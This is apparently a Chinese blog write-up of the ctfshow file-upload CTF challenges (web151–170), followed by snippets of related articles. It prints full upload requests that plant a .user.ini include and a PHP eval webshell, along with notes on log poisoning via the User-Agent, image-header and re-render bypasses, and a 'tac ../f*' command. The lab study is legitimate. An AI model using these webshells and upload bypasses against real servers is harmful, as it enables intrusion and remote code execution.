[CTF]ctfshow 文件上传

最新推荐文章于 2024-05-03 14:53:18 发布
最新推荐文章于 2024-05-03 14:53:18 发布
阅读量293 收藏 8
点赞数 5
文章标签: linux 网络 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63416413/article/details/136592544
版权
文章讨论了在web开发中遇到的安全问题,如后端验证缺失导致的文件上传漏洞,如何利用ini文件、PHP代码执行和文件名技巧进行命令执行。作者还提到了常见的防御措施和绕过方法,如检查文件内容、限制括号使用和图片处理以避免RCE攻击。
摘要由CSDN通过智能技术生成

开始

web151
后端无验证,考虑在浏览器中修改前端代码

web152
\u6587\u4ef6\u7c7b\u578b\u4e0d\u5408\u89c4这为何能提示文件内容不合规
Content-Type: image/png关键字段
此题有后端验证

web153
上传.ini文件
.user.ini中写auto_append_file=1.txt
(auto_prepend_file=1.txt也可,二者区别是是在脚本执行前或脚本执行后加载文件)
修改Content-Type

发.user.ini

POST /upload.php HTTP/1.1
Host: 848be834-1c62-42ba-b6fb-67e17d0797f2.challenge.ctf.show
Content-Length: 204
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEVXGJZAVO5a3WfZC
Origin: http://74d67792-c98e-45af-b9c1-5e1cf135b05d.challenge.ctf.show
Referer: http://74d67792-c98e-45af-b9c1-5e1cf135b05d.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundaryEVXGJZAVO5a3WfZC
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_append_file=1.txt
------WebKitFormBoundaryEVXGJZAVO5a3WfZC--

发1.txt

POST /upload.php HTTP/1.1
Host: 848be834-1c62-42ba-b6fb-67e17d0797f2.challenge.ctf.show
Content-Length: 204
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEVXGJZAVO5a3WfZC
Origin: http://74d67792-c98e-45af-b9c1-5e1cf135b05d.challenge.ctf.show
Referer: http://74d67792-c98e-45af-b9c1-5e1cf135b05d.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundaryEVXGJZAVO5a3WfZC
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: image/png

<?php eval($_POST[1]);?>

------WebKitFormBoundaryEVXGJZAVO5a3WfZC--

若出现回显,则可尝试命令执行
回显:Notice: Undefined offset: 1 in /var/www/html/upload/1.txt on line 1
疑问:在这个在线环境中,如果上传多个.user.ini或多个1.txt会导致回显异常,这是怎么回事呢

web154
对上传的文件内容检测,要求不能包含php,考虑替换为短标签

web156
[]被ban可用{}

web157
;被ban,要求POST之后不能跟任意括号,考虑使用array_pop()方法把$_POST的最后一个内容弹出,尝试执行

web158
同上题

web159
不让用括号,适用include
为何写马的机会只有一次?
写错了后面就没法执行了

web160
空格不让用就换成0d,换行符

.user.ini
auto_append_file=1.txt

1.txt

<?php include '/var/lo'.'g/nginx/access.lo'.'g'?>

ua

<?php eval($_POST[1]);?>

问题提示?
Notice: Undefined offset: 1 in /var/log/nginx/access.log on line 23

为何要使用/upload/呢,少了最后一个/就没法成

web160
GIF89a绕过
文件头基操

web161
ip地址转换为长地址,不包含.
这是远程地址包含
需要远程服务器,稍后尝试
这道题也可用session竞争,只是远程包含不需要竞争条件,做起来比较方便

copy shell.jpg /b+txt.php/a jshell.jpg

web165
CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), default quality二次渲染,马可能被过滤
绕过服务器对图片的二次渲染
图片需要精细挑选

web166
压缩包包含,一般来说.zip文件不会被解析,这个题目点击下载文件返回html内容,很奇怪,回显内容没看到eval的马,但是使用post能传参数能RCE

web167
httpd和htaccess有什么关系??

web168
基础免杀,上传php后缀文件,数据包内反引号内写动态函数,达到RCE

web169
高级免杀,想要包含日志文件,目录下需要有index.php文件,才可包含/var/log/nginx/access.log,故先上传个任意内容的index.php,然后再.user.ini包含日志,通过马RCE

web170
与上题类似,有时浏览器没有回显,但是burpsuit有回显,需要使用phpinfo();标记,比较好观察

到此完结

Hugo_McQueen
关注
一些CTF 做题的tricks
qq_36495104的博客
07-01 2659
一些CTF 做题的tricks,东拼西凑放到这里,方便查找 任意文件读取路径汇总 任意文件读取漏洞和文件包含漏洞的表现相似,但是任意文件读取不能getshell,可以通过尝试读取相对路径的脚本文件,比如/read.php?file=index.php,如果可以读取到文件源码,说明是文件读取,如果不能读取到文件源码说明是文件包含。 下面收集的是一些常用的利用路径,应该够用了,以后也会及时更新,放在这便于以后的查阅和参考: 需要高权限读取的: 用户信息文件 /etc/passwd # 用来
CTFshow 文件上传 web162
Kradress的博客
02-15 2160
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
文件上传漏洞绕过方法和防御方法
Kris__zhang的博客
07-22 6068
文章目录上传流程概述客户端检测绕过检测(js检测)绕过方式1. 利用firebug禁用js2. 通过brup等代理工具服务端检测绕过(MIME检测)绕过方式通过brup等代理工具服务端检测绕过(扩展名检测)绕过方式文件名大小写绕过名单列表绕过特殊文件名绕过截断绕过.htaccess 文件攻击服务端检测绕过(文件内容检测)文件头检测文件加载检测解析攻击直接攻击配合攻击Apache 解析漏洞IIS 解析漏洞php-cgi 上传流程概述 一个文件以http协议上传的时候,将以post请求发送至web服务器。服务器
文件上传 05 服务端检测绕过(文件内容检测)
kevinhanser
08-13 6333
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
上传验证绕过总结
Aurora的博客
03-26 5249
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 目录 0x01 客户端验证绕过(javascript 扩展名检测) 0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单
ctfshow文件上传
weixin_53955759的博客
04-15 811
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow 文件上传 web153
Kradress的博客
02-15 1821
目录思路总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 条件: 服务器脚本语言为PHP
CTFshow 文件上传 web166
Kradress的博客
02-16 486
目录思路总结 思路 直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip 直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面 在上传的zip尾部添加shell,访问/upload/download.php?file=1048f28ab4d2da951869bc5579e7525c.zip抓包拿到flag <?php phpinfo();system("tac ../f*");?> 总结 没什么过滤 ...
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 854
只是过滤了分号,其他同上。php的最后一个分号可以省略。
致力于打造最详细的Requests使用(不定期补充)
MrLevo520的博客
07-23 9543
Python 2.7 IDE Pycharm 5.0.3 Requests 2.10是时候静心下来好好研究一下Requests了 安装方法我这里只说在Pycharm+Anaconda2下怎么添加requests包,至于如何在Pycharm下安装Anaconda2,请看@zhusleep 和@木子岚的回答 然后安装大概是这样的,简单快捷,不用pip,不用easy install,anaconda
php去除creator gd-jpeg 信息,PHP:使用ImageMagick完美代替GD类库处理图像 - 金牛座, 爬山虎, PHPCreeper, Workerman, Swoole, PHP...
weixin_42588672的博客
03-12 276
在使用php开发之中大家都习惯使用gb类库来处理图像信息,但是函数很多的gb类库也是很头疼,使用起来要一个个的查询函数和看官方手册,下面将介绍一个很强大的图像处理工具:ImageMagick,这个在Liunx下面处理图像信息将会更简洁。百度百科:ImageMagick是一套功能强大、稳定而且免费的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF...
php image jpg不显示图片,新手提问。php 使用imagejpeg(图片) 显示图片 写一个显示一张图片写两个 为什么还是显示一张?...
weixin_39882623的博客
03-13 940
研究了下复制了代码
php去除creator gd-jpeg 信息,PHP使用GD库实现截屏
weixin_29150151的博客
03-12 146
PHP5.2.2以上版本的GD库实现了两个截屏函数 imagegrabscreen 和 imagegrabwindow ,分别用于截取整个屏幕和截取某个窗口(同ALT+PrintScreen)的屏幕。1. 截取整个屏幕 ScreenshotPHP代码$im = imagegrabscreen();imagepng($im, "myscreenshot.png");?>2. 截取一个窗口 Ca...
js 将图片转成文件流
hollebug的博客
08-29 1992
第一步将图片临时路径转成 二进制。第二步将二进制转换为file。
php 处理图片不失真,PHP 图片 保持高宽不变压缩之后imagejpeg($source,$file,100) 仍旧失真! | 学步园...
weixin_39888943的博客
03-18 184
图片品质前后对比 : var_dump(exif_read_data($img));查看 ,严重失真压缩比为 50%。压缩前:array (size=18)'FileName' => string '1367000585017724053.JPG' (length=23)'FileDateTime' => int 1367029384'FileSize' => int 67872...
文件上传绕过】——二次渲染漏洞
热门推荐
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   关键数据块定义
【Web安全】htaccess攻击
likinguuu的博客
03-08 1832
这篇文章总结了一些比较容易理解的htaccess攻击,比如自定义出错界面、强制文件执行方式、PCRE绕过正则匹配、php_value修改php设定、php_value文件包含、把htaccess当作php
2024年Linux CentOS 环境下安装JDK的三种方法(2),2024年最新农民工看完都学会了
最新发布
2401_83947434的博客
05-03 1134
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值